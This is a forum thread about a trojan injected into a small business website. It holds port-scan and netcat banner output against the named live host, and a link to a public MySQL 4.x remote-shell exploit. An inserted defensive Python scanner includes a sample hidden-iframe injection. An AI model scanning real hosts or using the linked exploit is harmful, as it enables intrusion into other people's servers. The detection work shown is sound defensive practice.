Trojan Blocked
Comments
Thanks Scott, I've run a Malwarebytes scan which reports nothing. Any idea how or why this infection is lodged on this site?
Usually it is done by making use of a vulnerability in the website's management system, stealing FTP passwords...etc...
Then they inject the code. Sure makes an argument against the strength of "common sense" in protecting against viruses, seeing how few detect obfuscated code...
And for when the AV doesn't detect it, something like NoScript can help (will block the script/iframes - until you explicitly run it, but that isn't something you would be blase about) but for users who are not used to it, it can be rather tiresome...which I understand.
asbokid,
Nice, thanks, but can you please remove it; otherwise there will be alerts on this page and in sessionstore.js (Firefox anyway, equivalent for others).
That is why I post images, as they show the script but don't cause alerts. I know you deactivated the link, but it could still generate an alert.
-Scott-
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” Richard Feynman
As Avast prevents me from getting to the website, is the infection in an image on the website?
No, it is an iframe, that basically loads the (external) page that asbokid posted. Which then serves some exploit/loads some other code or whatever...
-Scott-
If I ring them tomorrow, how should I explain it?
I just scanned ww--w.cu--rat--ech.net (83.170.64.77)
Interesting ports on superultra7.uk2.net (83.170.64.77):
PORT     STATE  SERVICE  VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp?
|_ ftp-bounce: no banner
80/tcp   open   http?
|_ html-title: Welcome to the curatech.net homepage
3306/tcp open   mysql?
It's pretty, erm, brave to leave a mysql daemon open to the world and his dog. That's probably how the hacker gained entry. Once he was in, he then installed himself an ftp server, so he could upload his malware!
$ nc www.curatech.net 3306
+ 4.0.24-log�=MKmg>;O,
^C
$
Now what's the bet that somewhere on net there's a ready-rolled script to exploit a vulnerability in mysql version 4.0.24..
Once the hacker had exploited the mysql vulnerability and elevated his privileges, he could access the /var/www directory on the server. That's the directory tree where all the pages hosted by an apache webserver are normally found. The hacker then ran another script that appended his obfuscated malware code to every web page in that directory tree.
The hacker is probably compromising hundreds of websites every hour.
He just port scans tcp/3306 on whole netblocks, looking for responses containing the "4.0.24-log" banner.. That identifies the site as vulnerable, and he then targets it.
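A defender-side check for the symptom described above (obfuscated code appended to every page under the web root), added here as an example and not code from anyone in this thread: it walks a document root such as /var/www and flags hidden iframes and document.write(unescape(...))-style obfuscation. The two-page sample site and the attacker.invalid host are constructed placeholders.

```python
import os
import re
import tempfile

# Heuristics for the injection the thread describes: an iframe that pulls an external
# page but is sized/styled so nobody sees it, and JS wrapped in document.write/eval(unescape()).
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(?:(?:width|height)\s*=\s*[\"']?0(?![0-9])"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>", re.IGNORECASE)
OBFUSCATED_JS = re.compile(
    r"(?:document\.write|eval)\s*\(\s*unescape\s*\(", re.IGNORECASE)

def scan_file(path):
    """Return [(line_number, finding_kind), ...] for one page, in file order."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if OBFUSCATED_JS.search(line):
                findings.append((lineno, "obfuscated-js"))
            if HIDDEN_IFRAME.search(line):
                findings.append((lineno, "hidden-iframe"))
    return findings

def scan_tree(root, exts=(".html", ".htm", ".php")):
    """Walk a document root (e.g. /var/www); map each flagged page to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                hits = scan_file(path)
                if hits:
                    report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report

# Constructed sample site: one clean page, one with a payload appended as in the thread.
CLEAN = "<html><body><h1>Welcome</h1><p>Contact us.</p></body></html>\n"
INFECTED = CLEAN + (
    '<script>document.write(unescape("%3Cscript%3E%3C/script%3E"))</script>\n'
    '<iframe src="http://attacker.invalid/in.php" width="0" height="0" '
    'style="visibility:hidden"></iframe>\n')

def demo():
    """Write the sample site to a temp dir, scan it and return the report."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in (("index.html", INFECTED), ("about/index.html", CLEAN)):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_tree(root)
```

Run scan_tree against the real document root to get a per-file list of suspicious lines; a finding in every page at the same trailing line is the appended-to-everything pattern this thread is about.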
I'm amazed at the knowledge of you guys!!!
asbokid...link is active
-Scott-
Did all of you contributors do computer science degrees?
Now what's the bet that there's a ready-rolled script to exploit a vulnerability in mysql version 4.0.24..
There's really no reason to be running such an ancient version of mysqld today, and no excuse for leaving it open to the world. The mysql daemon should be up-to-date and safely tucked behind a firewall, or in a VPN, or listening for connections from localhost or local clients only.
EDIT: This looks like the best exploit for mysqld 4.x.x. The hacker perhaps used it. -- The remote exploit binds a shell to a network port. It would allow the hacker to log in to that estate agent's website and do anything that the owner of the mysqld database process is able to do...
MySQL COM_TABLE_DUMP Information Leakage and Arbitrary command execution.
Author: Stefano Di Paola
Vulnerable: MySQL <= 4.0.26, 4.1.18,5.0.20
MySQL Server has an information leakage flaw if a malicious client sends a specific forged packet. Moreover some particular input can crash the server by overwriting the stack which could lead to remote server compromise.
http://www.wisec.it/vulns.php?page=8
http://www.wisec.it/Download/vulns/my_com_table_dump_exploit.c
If I ring them tomorrow, how should I explain it?
-Scott-
This discussion has been closed.